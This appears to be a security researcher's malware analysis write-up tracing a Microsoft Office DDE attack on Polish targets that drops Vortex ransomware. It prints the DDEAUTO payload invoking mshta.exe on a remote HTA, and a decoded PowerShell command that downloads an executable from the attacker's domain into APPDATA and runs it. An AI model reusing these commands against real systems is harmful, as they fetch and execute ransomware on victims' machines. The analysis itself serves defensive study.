Microsoft Office DDE Poland Targeted Vortex Ransomware

pedram@PedBook:~/VXFarm/dde/day-5
$ vti bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9
2017-10-15 18:14:33 INFO Starting VirusTotal Intelligence downloader
2017-10-15 18:14:33 INFO * VirusTotal Intelligence search: bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9
2017-10-15 18:14:33 INFO * Number of files to download: 100
2017-10-15 18:14:33 INFO Creating folder to store the requested files
2017-10-15 18:14:33 INFO Retrieving page of file hashes to download
2017-10-15 18:14:33 INFO Retrieved 1 matching files in current page, queueing them
2017-10-15 18:14:33 INFO No more matching files
2017-10-15 18:14:33 INFO Waiting for queued downloads to finish
2017-10-15 18:14:33 INFO Downloading file bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9
2017-10-15 18:14:34 INFO bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 download was successful
2017-10-15 18:14:40 INFO The downloaded files have been saved in ./

# here's the meat. using mshta.exe as the pivot, masking through word:

DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe "http://w-szczecin.pl/img2/NEW15_10.doc/index.hta

$ wget http://w-szczecin.pl/img2/NEW15_10.doc/index.hta
--2017-10-15 18:15:08-- http://w-szczecin.pl/img2/NEW15_10.doc/index.hta
Resolving w-szczecin.pl... 91.231.140.161
Connecting to w-szczecin.pl|91.231.140.161|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3444 (3.4K)
Saving to: ‘index.hta’
2017-10-15 18:15:09 (109 MB/s) - ‘index.hta’ saved [3444/3444]

pedram@PedBook:~/VXFarm/dde/day-5
$ cat index.hta


Out[38]: '\n\n\n\n\n\n\n'

In [40]: print base64.b64decode("UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AH
...: MAdAB5AGwAZQAgAG0AaQBuAGkAbQBpAHoAZQBkACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBu
...: AGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AC0AcwB6AGMAegBlAGMAaQBuAC4AcABsAC8AaQBtAGcAMgAvAHMANQAwAC4AZQB4AGUAJwAsAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABuAHYAcw
...: BzAC4AZQB4AGUAHSApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAG4AdgBzAHMALgBlAHgAZQAdICkA")
PowerShell -ExecutionPolicy bypass -noprofile -windowstyle minimized -command (New-Object System.Net.WebClient).DownloadFile('http://w-szczecin.pl/img2/s50.exe';, $env:APPDATA\nvss.exe );Start-Process ( $env:APPDATA\nvss.exe )

Pull down the .exe ... first upload to VT:





This final .exe payload masquerades as an NVIDIA service. Joe sandbox report:


Communicates with:

  • beer-ranking[.]pl

Domain was registered on 2017-10-14 with an address tied to nearly 600,000 other domains:


It's ransomware. We see some traffic initially to grab a unique crypto key:

/gen
B8DGOzr9KX*WA6RI2GCESq9uLEL*P8S115qz(srIZ)(84PBQ5N4HNXM8!74K0HwKxxSuzUM8SJ0H9!7YIU_6CLYxCMR*4YH@5@))OK6r4PIXLAF34ETqZCy!Y08MHzGxsFuQ0@SNJ!u5uJR9Yw@GHrC_1tLsC1zEqD50xIyQEDFIW7CE*wTDy6C89X!uItJIHzsOQA)4MExsuIGrO@EW0QOTyKZPOr85A!D0wCOSPUUU(!WM69sPKRtR!2rJ3@z(5MY@YwMy1r2Z(Hu3BxD

The ransomware is Vortex: